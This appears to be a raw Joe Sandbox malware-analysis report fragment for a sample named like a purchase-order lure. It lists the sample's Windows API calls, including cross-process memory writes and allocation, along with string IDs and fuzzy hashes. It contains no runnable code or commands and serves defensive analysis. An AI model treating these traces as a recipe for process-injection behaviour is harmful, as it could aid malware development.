                                                                                        • API ID: CreateInitializeInstanceUninitialize
                                                                                        • String ID: .lnk
                                                                                        • API String ID: 948891078-24824748
                                                                                        • Opcode ID: 0d95a7b8efd29d9bff4e57cd416bcfe692d0f87c49e52e07a35a595b8547f688
                                                                                        • Instruction ID: 605b303dec41d86b9006ad68fbc39a8b933418fd5c83e8205e1d6ead7464b05a
                                                                                        • Opcode Fuzzy Hash: 0d95a7b8efd29d9bff4e57cd416bcfe692d0f87c49e52e07a35a595b8547f688
                                                                                        • Instruction Fuzzy Hash: 33A13B71104201AFD700EF64C881DAFB7ECEF98714F0489ADF59997192EB71EA49CB92
                                                                                        APIs
                                                                                          • Part of subcall function 00B6660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B653B1,?,?,00B661FF,?,00000000,00000001,00000000), ref: 00B6662F
                                                                                        • CoInitialize.OLE32(00000000), ref: 00BAE85D
                                                                                        • CoCreateInstance.OLE32(00BEDA7C,00000000,00000001,00BED8EC,?), ref: 00BAE876
                                                                                        • CoUninitialize.OLE32 ref: 00BAE893
                                                                                          • Part of subcall function 00B6936C: __swprintf.LIBCMT ref: 00B693AB
                                                                                          • Part of subcall function 00B6936C: __itow.LIBCMT ref: 00B693DF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                        • String ID: .lnk
                                                                                        • API String ID: 2126378814-24824748
                                                                                        • Opcode ID: 848c64eba5ead7db43511f0e6a0086565c3cb6bffc30cfd07ab5fe6653525714
                                                                                        • Instruction ID: 27f840b06467b834a4ed610ce9cc94d578449f37745e0186c45d0119a1576d22
                                                                                        • Opcode Fuzzy Hash: 848c64eba5ead7db43511f0e6a0086565c3cb6bffc30cfd07ab5fe6653525714
                                                                                        • Instruction Fuzzy Hash: C6A135756083019FCB14DF24C88496EBBE5FF89310F148998F9AA9B3A1CB35ED45CB91
                                                                                        APIs
                                                                                        • __startOneArgErrorHandling.LIBCMT ref: 00B832ED
                                                                                          • Part of subcall function 00B8E0D0: __87except.LIBCMT ref: 00B8E10B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorHandling__87except__start
                                                                                        • String ID: pow
                                                                                        • API String ID: 2905807303-2276729525
                                                                                        • Opcode ID: bcd8a5deef270bd7adae1f5b38cf56945b990381bda95f8edc2f8b31a14aa415
                                                                                        • Instruction ID: 5cf99c26ed37eb2f885faa8c0252c0c59a239ea76f85c880b3c07e6fb9fa2f3c
                                                                                        • Opcode Fuzzy Hash: bcd8a5deef270bd7adae1f5b38cf56945b990381bda95f8edc2f8b31a14aa415
                                                                                        • Instruction Fuzzy Hash: F4512771A0920296CB157B18C98537A2BD4EB40F10F248DE8F4E6832F9DF75CE98DB46
                                                                                        APIs
                                                                                        • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,00BFDC50,?,0000000F,0000000C,00000016,00BFDC50,?), ref: 00BA4645
                                                                                          • Part of subcall function 00B6936C: __swprintf.LIBCMT ref: 00B693AB
                                                                                          • Part of subcall function 00B6936C: __itow.LIBCMT ref: 00B693DF
                                                                                        • CharUpperBuffW.USER32(?,?,00000000,?), ref: 00BA46C5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharUpper$__itow__swprintf
                                                                                        • String ID: REMOVE$THIS
                                                                                        • API String ID: 3797816924-776492005
                                                                                        • Opcode ID: 6172734c11edf34ba5eab5fc651b7543f6e2d9a889d32c99ce90028a09c5de4d
                                                                                        • Instruction ID: 91c2820fd1a05faec556464b97ece7f6ddaae91cb8d8faec1c278e5cf7ac119e
                                                                                        • Opcode Fuzzy Hash: 6172734c11edf34ba5eab5fc651b7543f6e2d9a889d32c99ce90028a09c5de4d
                                                                                        • Instruction Fuzzy Hash: 13418034A042499FCF01DF68C881AADB7F5FF8A304F1484A9E916AB392DBB4DD45CB50
                                                                                        APIs
                                                                                          • Part of subcall function 00BA430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00B9BC08,?,?,00000034,00000800,?,00000034), ref: 00BA4335
                                                                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00B9C1D3
                                                                                          • Part of subcall function 00BA42D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00B9BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00BA4300
                                                                                          • Part of subcall function 00BA422F: GetWindowThreadProcessId.USER32(?,?), ref: 00BA425A
                                                                                          • Part of subcall function 00BA422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00B9BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00BA426A
                                                                                          • Part of subcall function 00BA422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00B9BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00BA4280
                                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00B9C240
                                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00B9C28D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                        • String ID: @
                                                                                        • API String ID: 4150878124-2766056989
                                                                                        • Opcode ID: e4301c972a16bd665291de6b7821f1da5dea2be869e751ace6f22d19500e6b0c
                                                                                        • Instruction ID: 63dda4b4453b87aeb789a4ef7f6822df6e4fd7695930621335603170f0335e97
                                                                                        • Opcode Fuzzy Hash: e4301c972a16bd665291de6b7821f1da5dea2be869e751ace6f22d19500e6b0c
                                                                                        • Instruction Fuzzy Hash: BE411972900218AFDF11DBA4CD81AEEBBB8EB49700F0041A5FA45B7181DBB16E45CB61
                                                                                        APIs
                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00BFDC00,00000000,?,?,?,?), ref: 00BCA6D8
                                                                                        • GetWindowLongW.USER32 ref: 00BCA6F5
                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00BCA705
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Long
                                                                                        • String ID: SysTreeView32
                                                                                        • API String ID: 847901565-1698111956
                                                                                        • Opcode ID: acc23313e32111b92675ead0ca4d6f2f672ed912ab05d7de451f3fe0a8973881
                                                                                        • Instruction ID: e4722e1e92a6b6fe4060715187a9aba9ad6a2bbc3219726c9f4036cb3e8273b9
                                                                                        • Opcode Fuzzy Hash: acc23313e32111b92675ead0ca4d6f2f672ed912ab05d7de451f3fe0a8973881
                                                                                        • Instruction Fuzzy Hash: 2F316D31600209AFDB218E38CC85FEA77A9FB49768F244769F975A32E0D770EC519B50
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00BCA15E
                                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00BCA172
                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00BCA196
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Window
                                                                                        • String ID: SysMonthCal32
                                                                                        • API String ID: 2326795674-1439706946
                                                                                        • Opcode ID: f04011a806f4159f7ecd37ca7f2a5acf499294ea975cc8a6990c043786765dd2
                                                                                        • Instruction ID: 7c3ac374a7f07fc920affc5436299835b13327122ec4cddcd1158add9673d138
                                                                                        • Opcode Fuzzy Hash: f04011a806f4159f7ecd37ca7f2a5acf499294ea975cc8a6990c043786765dd2
                                                                                        • Instruction Fuzzy Hash: 9A21D132510218ABDF118F94CC82FEA3BB9EF49724F140258FE55BB1D0D6B5AC51CBA0
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00BCA941
                                                                                        • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00BCA94F
                                                                                        • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00BCA956
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$DestroyWindow
                                                                                        • String ID: msctls_updown32
                                                                                        • API String ID: 4014797782-2298589950
                                                                                        • Opcode ID: 6e41db5a7ed9a5f81b298f09338762bbc0704e97dbaffe528197d404e35d067b
                                                                                        • Instruction ID: e13db30b1f2da6675db0bae0c085a8e35a79db2a508798366b7ed0c1f33162f0
                                                                                        • Opcode Fuzzy Hash: 6e41db5a7ed9a5f81b298f09338762bbc0704e97dbaffe528197d404e35d067b
                                                                                        • Instruction Fuzzy Hash: A92183B5600209AFDB10DF54CCC6E6B37EDEB5A3A8B050199FA149B251CA70EC11CB61
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00BC9A30
                                                                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00BC9A40
                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00BC9A65
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$MoveWindow
                                                                                        • String ID: Listbox
                                                                                        • API String ID: 3315199576-2633736733
                                                                                        • Opcode ID: defec13a73a8516cf1c25c505eec5ee1104c53d71646e0698e8d823d7f314d82
                                                                                        • Instruction ID: c2a3d0b45dbdd868ff259d6505b042141250d89d323729dafe7476fa1f93e11e
                                                                                        • Opcode Fuzzy Hash: defec13a73a8516cf1c25c505eec5ee1104c53d71646e0698e8d823d7f314d82
                                                                                        • Instruction Fuzzy Hash: CA219532610118BFEF258F54CC89FBF3BAAEF89760F018169F9545B190C6B19C5197A0
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00BCA46D
                                                                                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00BCA482
                                                                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00BCA48F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: msctls_trackbar32
                                                                                        • API String ID: 3850602802-1010561917
                                                                                        • Opcode ID: 65413784ae1909880c6c634e3eca7ce059e530145a70118bff864c2be5fef852
                                                                                        • Instruction ID: d500929476714494aa52fc86e63ccc2254c4999b8a7ee8ab37889603acda7c65
                                                                                        • Opcode Fuzzy Hash: 65413784ae1909880c6c634e3eca7ce059e530145a70118bff864c2be5fef852
                                                                                        • Instruction Fuzzy Hash: 2511E771200208BEEF245F65CC45FAB3BA9EF89768F01411CFA55A6191D6B1E811D720
                                                                                        APIs
                                                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00B82350,?), ref: 00B822A1
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00B822A8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: RoInitialize$combase.dll
                                                                                        • API String ID: 2574300362-340411864
                                                                                        • Opcode ID: 40ab9becb1ccc6a4786a76e87dfc54ab97f1b05da9cc69e79369eea677539793
                                                                                        • Instruction ID: 43c88f65a4f4d692dbd9377b32f07bbbb3c10d5b6620ed89ce1856795dd85cd8
                                                                                        • Opcode Fuzzy Hash: 40ab9becb1ccc6a4786a76e87dfc54ab97f1b05da9cc69e79369eea677539793
                                                                                        • Instruction Fuzzy Hash: F5E04F70AA0340ABDB206F71ED8DB5C36A4B705702F204069F202D64F1CBF48091CF04
                                                                                        APIs
                                                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00B82276), ref: 00B82376
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00B8237D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: RoUninitialize$combase.dll
                                                                                        • API String ID: 2574300362-2819208100
                                                                                        • Opcode ID: 3695c35f68929ad3f67f2ba1748a74001809fcaa3e297a720e5de76f85d7068e
                                                                                        • Instruction ID: 6371cf483fbec48c4e10ca2ecfcdeb50c979456ea1e32941108fff869771a1f8
                                                                                        • Opcode Fuzzy Hash: 3695c35f68929ad3f67f2ba1748a74001809fcaa3e297a720e5de76f85d7068e
                                                                                        • Instruction Fuzzy Hash: 2BE0B670555340AFDB306F62ED4EB0C3AA4B705702F214465F20BE64B1CBF89421DB15
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: LocalTime__swprintf
                                                                                        • String ID: %.3d$WIN_XPe
                                                                                        • API String ID: 2070861257-2409531811
                                                                                        • Opcode ID: eb130616dfacabcb191d1368310612175163b308754f33730a214704a0dce3d1
                                                                                        • Instruction ID: 514b62092220b529de9b7eb957332bddb1717732a2d7f7f8e6b81323ee82ac29
                                                                                        • Opcode Fuzzy Hash: eb130616dfacabcb191d1368310612175163b308754f33730a214704a0dce3d1
                                                                                        • Instruction Fuzzy Hash: 75E012B1814618EBCB149750CD85DFAF3FCEB08751F1844D3BA0AA2210F6359BC4EB12
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00B642EC,?,00B642AA,?), ref: 00B64304
                                                                                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00B64316
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                        • API String ID: 2574300362-1355242751
                                                                                        • Opcode ID: 5947f88cf23330122b9bd61479ac2045f2492b064506eeecfe5659b429703dce
                                                                                        • Instruction ID: ffdae19753ea987498cae104ed57e7d09bc78b80e60bd10b8dc2029c72e2a6b6
                                                                                        • Opcode Fuzzy Hash: 5947f88cf23330122b9bd61479ac2045f2492b064506eeecfe5659b429703dce
                                                                                        • Instruction Fuzzy Hash: B9D0A934900B12AFC7204F20E84C7827AE8EF06312F00847EE882E3260EBF4C8C08B10
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00BC21FB,?,00BC23EF), ref: 00BC2213
                                                                                        • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00BC2225
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: GetProcessId$kernel32.dll
                                                                                        • API String ID: 2574300362-399901964
                                                                                        • Opcode ID: 18091c2dcbf2e06b1f463ba6f733b372a58b3f0af5b2a4b2a57541a68dbf66d3
                                                                                        • Instruction ID: 799c3ab109bf726e54e96c18f65690abaf8ee4435da08c44b21db51625a9c484
                                                                                        • Opcode Fuzzy Hash: 18091c2dcbf2e06b1f463ba6f733b372a58b3f0af5b2a4b2a57541a68dbf66d3
                                                                                        • Instruction Fuzzy Hash: 59D0A7385007129FC7214F30F848B4176E5EF06712B00447DE841F7150DBB0D8C09750
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,00B641BB,00B64341,?,00B6422F,?,00B641BB,?,?,?,?,00B639FE,?,00000001), ref: 00B64359
                                                                                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00B6436B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                        • API String ID: 2574300362-3689287502
                                                                                        • Opcode ID: f3d56e63b754b97e114cb5b5c6f0829febddd1b0865f84ff5ab9f1f8a287daf2
                                                                                        • Instruction ID: d0d94883b5f95a11c68a5cdd14910419d3f48199ce42cc9be0bebec6a8479a6c
                                                                                        • Opcode Fuzzy Hash: f3d56e63b754b97e114cb5b5c6f0829febddd1b0865f84ff5ab9f1f8a287daf2
                                                                                        • Instruction Fuzzy Hash: 43D05234900B12AEC7204B30A8486827AE8EB2171AB00847AE882E2250EBB4D8808A14
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(oleaut32.dll,?,00BA051D,?,00BA05FE), ref: 00BA0547
                                                                                        • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00BA0559
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
